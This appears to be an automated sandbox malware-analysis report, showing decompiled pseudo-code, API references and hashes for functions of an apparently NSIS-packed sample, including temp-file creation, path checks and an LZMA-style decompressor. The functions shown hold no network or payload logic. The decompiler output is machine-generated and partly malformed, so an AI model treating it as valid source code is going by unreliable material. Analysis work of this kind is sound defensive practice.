0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040602c
0x00406032
0x00406033
0x00406033
0x00406038
0x00406039
0x0040603c
0x00406041
0x00406044
0x0040604e
0x0040605b
0x0040605f
0x00406067
0x00000000
0x00000000
0x0040606b
0x00000000
0x0040606d
0x0040606d
0x0040606d
0x00406070
0x00406073
0x00406073
0x00406076
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F

Strings

nsa, xrefs: 00406033
C:\Users\user\AppData\Local\Temp\, xrefs: 0040602B

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405EDE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406507(0x425f10, _a4);
				_t21 = E00405E81(0x425f10);
				if(_t21 != 0) {
					E0040678E(_t21);
					if(( *0x42a238 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f10 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f10);
							_push(0x425f10);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040683D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E22(0x425f10);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DD6();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405eea
0x00405ef5
0x00405ef9
0x00405f00
0x00405f0c
0x00405f1c
0x00405f1e
0x00405f36
0x00405f37
0x00405f3e
0x00405f3f
0x00000000
0x00000000
0x00405f22
0x00405f29
0x00405f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f29
0x00405f41
0x00405f47
0x00000000
0x00405f55
0x00405f0e
0x00405f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f14
0x00405efb
0x00000000

APIs

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407033() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
